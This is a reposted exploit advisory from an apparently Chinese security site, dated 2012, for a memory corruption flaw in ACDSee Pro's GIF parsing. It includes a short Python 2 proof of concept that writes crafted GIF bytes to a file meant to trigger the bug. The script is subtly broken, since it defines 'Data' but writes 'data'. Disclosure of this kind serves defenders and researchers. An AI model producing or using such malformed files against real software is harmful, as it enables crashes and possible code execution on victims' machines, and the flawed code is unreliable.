首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ACDSee PRO .GIF Processing Memory Corruption Vulnerability
来源:Senator.of.Pirates.team[at]gmail.com 作者:Senator 发布时间:2012-09-25  
 
# Title : ACDSee PRO .GIF Processing Memory Corruption Vulnerability
# Auther : Senator of Pirates
# FaceBook : /SenatorofPiratesInfo
# E-Mail : Senator.of.Pirates.team[at]gmail.com
# Greeting : To my best friend Mr. Marshal Webb

# Bug :
--------
Memory corruption flaw exists in ACDSee Pro. The program fails to sanitize user-supplied input when
an error occurs in IDE_ACDStd.apl resulting in memory corruption. When allocating memory based on
values in the Logical Screen Descriptor structure of a GIF image, a context-dependent attacker can execute
arbitrary code.

# PoC :
---------
Data = ("\x49\x46\x38\x39\x61\x0C\x00\x0C\x00\x00\xE3\x00\x00\x00\x00\x80\x00\x00\x00\x80"
"\x00\x80\x80\x00\x00\x00\x80\x80\x00\x80\x00\x80\x80\x80\x80\x80\xC0\xC0\xC0\xFF\x00"
"\x00\x00\xFF\x00\xFF\xFF\x00\x00\x00\xFF\xFF\x00\xFF\x00\xFF\xFF\xFF\xFF\xFF\x21\xF9"
"\x04\x01\x00\x00\x0F\x00\x2C\x00\x00\x00\x00\x0C\x00\x0C\x00\x00\x04\x2C\xF0\xC8\x49"
"\x27\xB8\x38\xA3\x03\x1E\xF2\xE0\xB7\x01\x62\x78\x20\x63\xE8\x49\x2B\x79\xAE\x12\xCA"
"\x3D\xF1\x24\x72\x1B\x25\xA6\xF9\x7B\x93\xAB\x92\xAC\x23\x34\xA1\x8E\x48\x54\x04\x00"
"\x3B");
try:
    A = open("PoC.gif","wb")     
    A.write(data)
    A.close()
    print "[*] The file created [*]"
except:
    print "[*] Error while creating file [*]"
 
print "[*] Enter to continue.. [*]"
raw_input()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ZEN Load Balancer Filelog Comm
·SafeNet Sentinel Keys Server C
·NTR ActiveX Control Check() Me
·QNX QCONN Remote Command Execu
·NTR ActiveX Control StopModule
·Guacamole 0.6.0 Buffer Overflo
·Golden Al-Wafi Translator 1.12
·Counter Strike Servers Remote
·Thomson Wireless VoIP Cable Mo
·HP ALM Remote Code Execution
·Auxilium RateMyPet Arbitrary F
·Microsoft Internet Explorer ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved